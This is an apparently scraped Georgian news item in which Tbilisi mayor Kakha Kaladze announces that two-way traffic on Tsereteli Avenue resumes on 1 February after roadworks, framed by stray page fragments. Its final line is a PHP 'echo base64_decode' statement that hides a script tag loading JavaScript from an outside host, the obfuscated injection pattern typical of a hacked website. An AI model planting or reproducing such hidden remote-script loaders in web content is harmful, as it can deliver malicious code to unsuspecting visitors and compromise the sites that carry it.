celsiusi
ავერსი შნაიდერი

პირველი თებერვლიდან, როგორც დაგპირდით, წერეთლის გამზირზე მოძრაობა იქნება ორმხრივად აღდგენილი და გადაადგილება თავისუფლად იქნება შესაძლებელი, – ამის შესადებ დედაქალაქის მერმა კახა კალაძემ თბილისის მთავრობის სხდომაზე განაცხადა.

როგორც კახა კალაძემ აღნიშნა, ხვალიდან კიდევ ერთი განახლებული გამზირი შეემატება ულამაზეს დედაქალაქს.

„დღეს 31 იანვარია, დედაქალაქის მოსახლეობას დავპირდით, რომ პირველი თებერვლიდან წერეთლის გამზირზე სამუშაოები საგზაო ნაწილში იქნებოდა დასრულებული და მოძრაობა ორმხრივად იქნებოდა შესაძლებელი, ახლაც მიმდინარეობს სამუშაოები, რომელიც საღამომდე მთლიანად დასრულებული იქნება, პარალელურად მიმდინარეობს დასუფთავების სამუშაოები. ხვალიდან, პირველი თებერვლიდან, როგორც დაგპირდით, წერეთლის გამზირზე მოძრაობა იქნება ორმხრივად აღდგენილი და გადაადგილება თავისუფლად იქნება შესაძლებელი. ხვალიდან კიდევ ერთი განახლებული გამზირი შეემატება ჩვენს ულამაზეს დედაქალაქს“, – განაცხადა კახა კალაძემ.

330
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");